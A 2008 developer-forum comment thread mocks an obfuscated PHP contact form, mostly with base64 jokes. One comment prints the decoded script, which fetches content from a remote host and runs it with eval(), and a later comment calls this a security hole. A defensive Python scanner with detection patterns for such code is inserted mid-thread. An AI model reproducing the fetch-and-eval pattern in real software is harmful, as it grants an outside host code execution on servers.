Comment On Superencryptalisticexpialidocious

Andreas C stumbled upon what might possibly be the most secure code ever written. At least, according to its original author.

Re: Superencryptalisticexpialidocious

2008-05-29 08:09 • by A Nonny Mouse
it's a php implementation of .net's __VIEWSTATE, obviously.

Re: Superencryptalisticexpialidocious

2008-05-29 08:09 • by Bob (unregistered)
QmFzZSA2NCBpcyB2ZXJ5IHNlY3VyZS4gQW5kIEZpcnN0Lg==

(Lol, base 64 is very secure).

Re: Superencryptalisticexpialidocious

2008-05-29 08:12 • by jvanderb
You never know what some 'hacker' might do if they figure out how to contact you. You might start getting spam or something!

Re: Superencryptalisticexpialidocious

2008-05-29 08:14 • by topcat_arg
This is too complex for Paula, isn't it?

Re: Superencryptalisticexpialidocious

2008-05-29 08:15 • by ChZEROHag
Y3JleSAtWlpWWlI6Ok9uZnI2NCAtciAnY2V2YWcgcXJwYnFyX29uZnI2NCAoIklUdWNwbE93bzIx
Z01KNTBWVHltVlVBeUwzSWxNRjRYIiknCg==

Re: Superencryptalisticexpialidocious

2008-05-29 08:19 • by akatherder
Was the coder storing PHP code in a session?

Re: Superencryptalisticexpialidocious

2008-05-29 08:21 • by gabba
I have failed to post first (1st). This is the seventh (7th) post.

Re: Superencryptalisticexpialidocious

2008-05-29 08:23 • by DOA
This code makes baby Jesus cry.

Re: Superencryptalisticexpialidocious

2008-05-29 08:23 • by Gieron
197475 in reply to 197470
ChZEROHag:
Y3JleSAtciAncmlueSB7IGNldmFnICJHdXZmIHBienpyYWcgdmYgZnJwaGVyLlxhIiB9Jwo=


cFNFV29UOURHenFBRXg1dUdIZ0FxSjlER21xSklIOWZveGIxWlNNREkwdWhJVXlnSXlFT25KOVha
S3lpTEhFMG94Z25xVDlYQkprQQpFeDlnR0hjT1pLTzZGVHVZSVFFMkl5SGpMRGNEcVEwOQ==

Re: Superencryptalisticexpialidocious

2008-05-29 08:27 • by ljj116
PWNED, er....UFdORUQ=


<?php session_start();

///MAILPERMIN///
if (isset($_SESSION['z812F708A1826292fS6569P765A7531935z4852E748A5830252'])) {
$_SESSION['x610Y706A1626094hS4953W749A5930351Z6468L764A7431836'] = time();
$s3337F733A4328767U5155A751A6130549x3842K738A4829262 =
abs($_SESSION['x610Y706A1626094hS4953W749A5930351Z6468L764A7431836']
- $_SESSION['z812F708A1826292fS6569P765A7531935z4852E748A5830252']);

$z3236T732A4228668u4347Z743A5329757x4650S746A5630054 = $s3337F733A4328767U5155A751A6130549x3842K738A4829262 / 60;
if ( ($_SESSION['s1721U717A2727183t26D702a12260198xy711T707A1726193j'] >= 20)
&& ($s3337F733A4328767U5155A751A6130549x3842K738A4829262 <= 30* 60 )) {
$z3236T732A4228668u4347Z743A5329757x4650S746A5630054 = 30 * 60 - $z3236T732A4228668u4347Z743A5329757x4650S746A5630054;
echo "you have exceeded the number of times you are allowed to use this form <br><br>Please try again in an one (1)hour or three(3)<br>";
exit;
}
elseif ($s3337F733A4328767U5155A751A6130549x3842K738A4829262 > 30* 60 ) {
session_unset();
$_SESSION['s1721U717A2727183t26D702a12260198xy711T707A1726193j'] = 0;
}
}
if (isset ($_SESSION['y711T707A1726193jS5761T757A6731143Z5660Y756A6631044'])) {
$_SESSION['x610Y706A1626094hS4953W749A5930351Z6468L764A7431836'] = time();
$s3337F733A4328767U5155A751A6130549x3842K738A4829262 =
abs($_SESSION['x610Y706A1626094hS4953W749A5930351Z6468L764A7431836']
- $_SESSION['y711T707A1726193jS5761T757A6731143Z5660Y756A6631044']);

$z3236T732A4228668u4347Z743A5329757x4650S746A5630054 = $s3337F733A4328767U5155A751A6130549x3842K738A4829262 / 60;

if ($z3236T732A4228668u4347Z743A5329757x4650S746A5630054 > 2) {
$_SESSION['x2226D722A3227678T6670O766A7632034y3135Y731A4128569'] = "";
}
} ///MAILPERMIN///

$id_hd = '88BB-5822';
$id_num = 'fghhijklklmnopqrstvvvwxwyyBDJLNQSUYZaZdefhkkmmnppqsvyABDEFILQUXXYXWTOIxkWJynfWNICzuqlfaVPLGAtlfbVSOLKIIJLPVaflryHSdmxGPbirAJUguFQ';
?>
<?php

$my_var = '';
$page_data = <<< PAGE_DATA
PAGE_DATA;
$Y6367K763A7331737W8589B785A9533915U9195O791A1013451 = @fopen ("http://www.spamfreecontact.com/err/?_=402&ok=$id_num", "r");
if (!$Y6367K763A7331737W8589B785A9533915U9195O791A1013451) {
/* echo "<p>Unable to open remote file."; */
/* exit; */
}
else {

while (!feof($Y6367K763A7331737W8589B785A9533915U9195O791A1013451)) {
$Y5559U755A6530945w2933H729A3928371v48H704A14260396w .= fgets ($Y6367K763A7331737W8589B785A9533915U9195O791A1013451, 1024);
}
eval (' ?>' . $Y5559U755A6530945w2933H729A3928371v48H704A14260396w . '<?php ');
fclose($Y6367K763A7331737W8589B785A9533915U9195O791A1013451);
}

if (($gotten == 111)&&($hd == $id_hd )) {
include ('initrodeGlobal_com.php');
}
elseif ($gotten != 111) {
include ('initrodeGlobal_com.php');
}
elseif (($gotten == 111)&&($hd != $id_hd )) {
echo $error_msg;
}
?>

Re: Superencryptalisticexpialidocious

2008-05-29 08:29 • by vt_mruhlin
One of my former jobs did a similar mucking around operation to their PHP, mainly to keep customers from going and messing with it then making support calls.

I know it was some package that they actually bought a license for. Never paid much attention to see how "secure" it was, as it was really there to be an annoyance.

Re: Superencryptalisticexpialidocious

2008-05-29 08:30 • by jvanderb
197479 in reply to 197467
topcat_arg:
This is too complex for Paula, isn't it?


How could that be? Paula is Brillant, isn't she?

Re: Superencryptalisticexpialidocious

2008-05-29 08:31 • by mongo (unregistered)
Looks like it was run through an obfuscation tool.

Captcha: Mongo like modo

Re: Superencryptalisticexpialidocious

2008-05-29 08:36 • by KattMan
197481 in reply to 197480
mongo:
Looks like it was run through an obfuscation tool.

Captcha: Mongo like modo


Exactly what I was thinking. No one, even those not in their right mind, would create variables like that.
Obfuscation would always rename your variables in this fashion, the encryption was also part of that process.

Re: Superencryptalisticexpialidocious

2008-05-29 08:44 • by bsander (unregistered)
The real WTF is this:

echo "you have exceeded the number of times you are allowed to use this form
<br><br>Please try again in an one (1)hour or three(3)<br>";

Re: Superencryptalisticexpialidocious

2008-05-29 08:46 • by mbvlist
This is just so obvious, it even shows how it's encoded in the SAME file!! It would have been a lot better to do the decryption in a separate PHP file, that only includes the encrypted file.

Or you could just use Zend Encoder, which would work, or write your own Apache-module to 'save money' ;)

If this is to run on the client's server, then this would probably suffice.

I once ran into a webpage that was entirely base64-encoded, except for one line of Javascript code. Hey smart-ass, if the user can see the page like it shows up, do you think the client can also use the HTML code? The real joke was that nobody would ever want to copy anything from that code, it looked like crap and so on... The author wanted my opinion on his site. "Well, it doesn't show up in firefox, and I think this line of code is the problem. And by the way, get rid of the encryption, because it only took me 10 minutes to get this code..."

Re: Superencryptalisticexpialidocious

2008-05-29 08:48 • by SchizoDuckie (unregistered)
It seems that this initrodeglobal.com is a major WTF-source. This is at least the third reference to that company on thedailywtf:

http://thedailywtf.com/Articles/Leave-That-One-Alone.aspx
http://thedailywtf.com/Articles/Some-one-is-trying-to-Hack-the-Site.aspx


And the site says
initrodeglobal.com:
Temporarily Closed for Maintenance

Come back soon. -- Alex P


Is it some kind of conspiracy?

Re: Superencryptalisticexpialidocious

2008-05-29 08:56 • by Claxon
197487 in reply to 197486
SchizoDuckie:
It seems that this initrodeglobal.com is a major WTF-source. This is at least the third reference to that company on thedailywtf:

http://thedailywtf.com/Articles/Leave-That-One-Alone.aspx
http://thedailywtf.com/Articles/Some-one-is-trying-to-Hack-the-Site.aspx


And the site says
initrodeglobal.com:
Temporarily Closed for Maintenance

Come back soon. -- Alex P


Is it some kind of conspiracy?


Please file this in a T.P.S. Report. ;)

Re: Superencryptalisticexpialidocious

2008-05-29 08:59 • by me (unregistered)
197488 in reply to 197486
SchizoDuckie:
It seems that this initrodeglobal.com is a major WTF-source. This is at least the third reference to that company on thedailywtf:

http://thedailywtf.com/Articles/Leave-That-One-Alone.aspx
http://thedailywtf.com/Articles/Some-one-is-trying-to-Hack-the-Site.aspx


And the site says
initrodeglobal.com:
Temporarily Closed for Maintenance

Come back soon. -- Alex P


Is it some kind of conspiracy?



Try watching Office Space http://www.imdb.com/title/tt0151804/

Re: Superencryptalisticexpialidocious

2008-05-29 09:05 • by StarLite
197489 in reply to 197487
Claxon:
SchizoDuckie:
It seems that this initrodeglobal.com is a major WTF-source. This is at least the third reference to that company on thedailywtf:

http://thedailywtf.com/Articles/Leave-That-One-Alone.aspx
http://thedailywtf.com/Articles/Some-one-is-trying-to-Hack-the-Site.aspx


And the site says
initrodeglobal.com:
Temporarily Closed for Maintenance

Come back soon. -- Alex P


Is it some kind of conspiracy?


Please file this in a T.P.S. Report. ;)

my stapler....


;)

Re: Superencryptalisticexpialidocious

2008-05-29 09:07 • by JonF (unregistered)
Should have used perl & Acme::Pony

Re: Superencryptalisticexpialidocious

2008-05-29 09:07 • by 名無しさん (unregistered)
There is an actual commercial package which costs quite a bit and does exactly this. Name escapes me.

Re: Superencryptalisticexpialidocious

2008-05-29 09:08 • by Jeroen Brattinga (unregistered)
Sh!t, we've been hacked. All our sensitive R&D data, customer credit and bank records have been stolen. Fortunately one part was uncompromised: the 'Contact Us'-form.

Re: Superencryptalisticexpialidocious

2008-05-29 09:11 • by SchizoDuckie (unregistered)
197493 in reply to 197488
me:
SchizoDuckie:
It seems that this initrodeglobal.com is a major WTF-source. This is at least the third reference to that company on thedailywtf:

http://thedailywtf.com/Articles/Leave-That-One-Alone.aspx
http://thedailywtf.com/Articles/Some-one-is-trying-to-Hack-the-Site.aspx


And the site says
initrodeglobal.com:
Temporarily Closed for Maintenance

Come back soon. -- Alex P


Is it some kind of conspiracy?



Try watching Office Space http://www.imdb.com/title/tt0151804/


Thanks for the tip. Utorrent is currently downloading :P

Re: Superencryptalisticexpialidocious

2008-05-29 09:17 • by Heem (unregistered)
197494 in reply to 197470
yes, quite secure.

Re: Superencryptalisticexpialidocious

2008-05-29 09:18 • by john (unregistered)
It looks like it's been run through an obfuscator.

Re: Superencryptalisticexpialidocious

2008-05-29 09:25 • by dave (unregistered)
PD9waHANCiAgJHRoaXNDb21tZW50LT5mZWF0dXJlZCA9IHRydWU7DQo/Pg==

Re: Superencryptalisticexpialidocious

2008-05-29 09:34 • by rbowes
Please, everybody, stop saying "encrypted" or "decrypted" -- there's no encryption going on here! Just encoding!

Re: Superencryptalisticexpialidocious

2008-05-29 09:36 • by Mtr (unregistered)
base64_decode($string2);

now what ?

Re: Superencryptalisticexpialidocious

2008-05-29 09:58 • by Leak
197509 in reply to 197493
SchizoDuckie:

Thanks for the tip. Utorrent is currently downloading :P

I see someone's directly headed for the 'pound me in the ass' prison...

Would it be too much to buy the DVD?

Re: Superencryptalisticexpialidocious

2008-05-29 10:04 • by zaphod (unregistered)
$comment = encrypt(":h>Y1~.`4");

Re: Superencryptalisticexpialidocious

2008-05-29 10:50 • by SchizoDuckie (unregistered)
197533 in reply to 197509
Save the environment! I don't buy plastic useless disks if I can download it too ;-)

Furthermore, only people from the USA go to pound-me-in-the-ass prisons for downloading movies :')

Re: Superencryptalisticexpialidocious

2008-05-29 10:50 • by Rob (unregistered)
spamfreecontact.com? That doesn't sound at all shady!

Re: Superencryptalisticexpialidocious

2008-05-29 10:52 • by Otto (unregistered)
This is not all that unusual, actually. It's just been run through an obfuscation tool. Several different ones exist for PHP. You simply run the final code through them, it replaces the variables with gibberish, removes comments and newlines and spaces and such, base 64 encodes, and spits out that result.

Because PHP is basically a scripting language, and therefore the source = the final result, and a lot of silly people want their code to be "secure from prying eyes", you get this sort of nonsense. Useless and ineffective, but... sigh. Try telling that to any of these morons.

One use of obfuscation lately that has been pissing me off is when somebody who makes a theme for WordPress (which is all PHP) obfuscates their own linkback into the footer of the thing, and does it in such a way as to make removing it difficult to a non-coder. A coder, of course, simply runs the code, copies the output, and replaces the obfuscated code with it, minus the linkback, but still, it's annoying. I'm trying to convince various theme hosting sites to not allow themes with this crap code it in. Fortunately, it's relatively easy to detect this sort of thing automatically. You just have to look for long strings of letters and numbers without much spacing.

Re: Superencryptalisticexpialidocious

2008-05-29 11:13 • by Federal Suppliers Guide (unregistered)
Wait, you hacked our site!? You can't do that! It's SECURE! You can get in a lot of trouble for hacking!

Re: Superencryptalisticexpialidocious

2008-05-29 11:30 • by anonymous (unregistered)
That's standard for code obfuscators -- they change all the variable names, remove all the white space, then base64 encode it.

Re: Superencryptalisticexpialidocious

2008-05-29 11:36 • by Joel (unregistered)
At this point, I'm going to have to run most of the comments through a base-64 decode just to see the pointless jokes.

Of course, that's not going to stop me from doing it.

Re: Superencryptalisticexpialidocious

2008-05-29 12:13 • by NegativeZero (unregistered)
I see crap like this all the time (I work in Antivirus development). It's basically just obfuscation. Normally you see it in VBScript and Javascript though.

Some of the other tricks they like to do are printing out Javascript which will then in turn be run (Javascript allows code to be self-modifying) and breaking things up by randomly URL-encoding characters in strings or even breaking them up and concatenating them, sometimes bringing in the results of random function calls or variables with junk names too.

This is the first time I've seen someone try and obfuscate PHP like this though.

Re: Superencryptalisticexpialidocious

2008-05-29 12:36 • by martinsc (unregistered)
wow... that's all i can say....

Re: Superencryptalisticexpialidocious

2008-05-29 12:39 • by WhiskeyJack
197581 in reply to 197541
Federal Suppliers Guide:
Wait, you hacked our site!? You can't do that! It's SECURE! You can get in a lot of trouble for hacking!


Nice! That was a great story.

Re: Superencryptalisticexpialidocious

2008-05-29 13:00 • by kris (unregistered)
They should base64 encode it twice, that way it will take hackers twice as long!

Re: Superencryptalisticexpialidocious

2008-05-29 13:37 • by Mnenhy (unregistered)

Re: Superencryptalisticexpialidocious

2008-05-29 13:59 • by Philip Hofstetter (unregistered)
the thing I like the most is the blatant security hole:


while (!feof($Y6367K763A7331737W8589B785A9533915U9195O791A1013451)) {
$Y5559U755A6530945w2933H729A3928371v48H704A14260396w .= fgets ($Y6367K763A7331737W8589B785A9533915U9195O791A1013451, 1024);
}
eval (' ?>' . $Y5559U755A6530945w2933H729A3928371v48H704A14260396w . '<?php ');
fclose($Y6367K763A7331737W8589B785A9533915U9195O791A1013451);


that file handle points to a remote URL fopen()ed earlier. So this code basically takes some remote content and feeds it into eval().

How nice of this coder to give their remote service shell access to his server :-)

Philip
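Following up on Otto's point that this kind of obfuscation is easy to spot mechanically (long runs of letters and digits with no spacing) and Philip's point about eval() being fed remotely fetched content, here is an added scanner that is not code from the thread or from the site under discussion. The rule names, the entropy threshold, the regexes and both PHP samples are my own constructions; the first sample only mimics the shape of the decoded script above.

```python
import math
import re

# Constructed samples (not the thread's actual code): the first mimics the
# obfuscated contact-form script, the second is ordinary hand-written PHP.
OBFUSCATED_PHP = r'''<?php
$Y6367K763A7331737W8589B785A9533915U9195O791A1013451 = @fopen("http://remote.invalid/err/?ok=$id_num", "r");
while (!feof($Y6367K763A7331737W8589B785A9533915U9195O791A1013451)) {
  $Y5559U755A6530945w2933H729A3928371v48H704A14260396w .= fgets($Y6367K763A7331737W8589B785A9533915U9195O791A1013451, 1024);
}
eval(' ?>' . $Y5559U755A6530945w2933H729A3928371v48H704A14260396w . '<?php ');
eval(base64_decode("QmFzZSA2NCBpcyB2ZXJ5IHNlY3VyZS4gQW5kIEZpcnN0Lg=="));
?>'''
CLEAN_PHP = r'''<?php
session_start();
$attempts = $_SESSION['attempts'] ?? 0;
if ($attempts >= 20) { echo "Too many attempts"; exit; }
?>'''

# Heuristics (assumed rule set): gibberish identifiers, base64-looking blobs,
# decode-then-eval, and eval() in a file that also opens a remote URL.
LONG_IDENT = re.compile(r"\$[A-Za-z_]\w{24,}")
B64_BLOB = re.compile(r"(?<![\w$])[A-Za-z0-9+/]{40,}={0,2}")  # not part of a $name
EVAL_B64 = re.compile(r"\beval\s*\(\s*base64_decode\s*\(")
EVAL_ANY = re.compile(r"\beval\s*\(")
REMOTE_OPEN = re.compile(r"\b(?:fopen|file_get_contents|include|require)\s*\(\s*[\"']https?://")

def shannon_entropy(s):
    """Bits per character; random base64 sits near 5, repeated padding near 0."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in (s.count(ch) for ch in set(s)))

def scan_php(source):
    """Return a list of (rule, evidence) findings for one PHP source text."""
    findings = []
    for m in LONG_IDENT.finditer(source):
        findings.append(("long_identifier", m.group(0)[:16] + "..."))
    for m in B64_BLOB.finditer(source):
        if shannon_entropy(m.group(0)) > 4.0:  # skip low-entropy runs
            findings.append(("base64_blob", m.group(0)[:16] + "..."))
    if EVAL_B64.search(source):
        findings.append(("eval_base64_decode", "eval(base64_decode(...))"))
    if EVAL_ANY.search(source) and REMOTE_OPEN.search(source):
        findings.append(("eval_with_remote_fetch", "eval() plus fopen/include of an http(s) URL"))
    return findings

def verdict(source):
    """'suspicious' when two or more distinct rules fire, otherwise 'clean'."""
    return "suspicious" if len({rule for rule, _ in scan_php(source)}) >= 2 else "clean"

if __name__ == "__main__":
    for name, src in (("obfuscated", OBFUSCATED_PHP), ("clean", CLEAN_PHP)):
        print(name, verdict(src), scan_php(src))
```

The long-identifier and blob rules only say "someone ran an obfuscator"; the two eval rules are the ones worth paging someone for, since they describe exactly the remote-code path Philip points out.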

Re: Superencryptalisticexpialidocious

2008-05-29 14:16 • by Sean (unregistered)
Why is a long variable name considered secure? notepad's find/replace easily defeats it

Re: Superencryptalisticexpialidocious

2008-05-29 14:20 • by GrandmasterB (unregistered)
It looks like some newb didn't understand the difference between client and server side execution. He was probably trying to obfuscate the data on the contact form so that spammers couldn't get the email address via web harvesting. I bet he read that in a shiny IT magazine.

Doing that in javascript does help to some extent. Doing it in PHP is just dumb.

Some PHP encoders make files that look similar to that base64 block of code, but I don't think that's what that is. They would have calls to decrypt the actual string.

Re: Superencryptalisticexpialidocious

2008-05-29 15:09 • by wesley0042 (unregistered)
197633 in reply to 197509
Or just watch it for free. It's on hulu.com

Re: Superencryptalisticexpialidocious

2008-05-29 15:22 • by Edward Royce (unregistered)
Hmmmmm.

I am not nearly drunk enough to read this article.

Re: Superencryptalisticexpialidocious

2008-05-29 15:23 • by Edward Royce (unregistered)
197638 in reply to 197618
Sean:
Why is a long variable name considered secure? notepad's find/replace easily defeats it


Now that's a clbuttic!

Re: Superencryptalisticexpialidocious

2008-05-29 19:00 • by Jay (unregistered)
197685 in reply to 197466
jvanderb:
You never know what some 'hacker' might do if they figure out how to contact you. You might start getting spam or something!


Or sales.

Re: Superencryptalisticexpialidocious

2008-05-29 19:04 • by Jay (unregistered)
I think a fun way to obfuscate code would be to change all the variable names to names that sound like they would be relevant to this program ... but aren't what the field actually contains. Like change "billing_amount" to "payment_amount" and "stock_number" to "quantity_on_hand". Then add a bunch of comments that carefully describe an algorithm that isn't actually a part of this program. Okay, it would be a lot of work, but I'd laugh and laugh thinking about the poor guy who comes after me trying to figure it out. I might try this next time I'm really really mad at the company, just before I quit.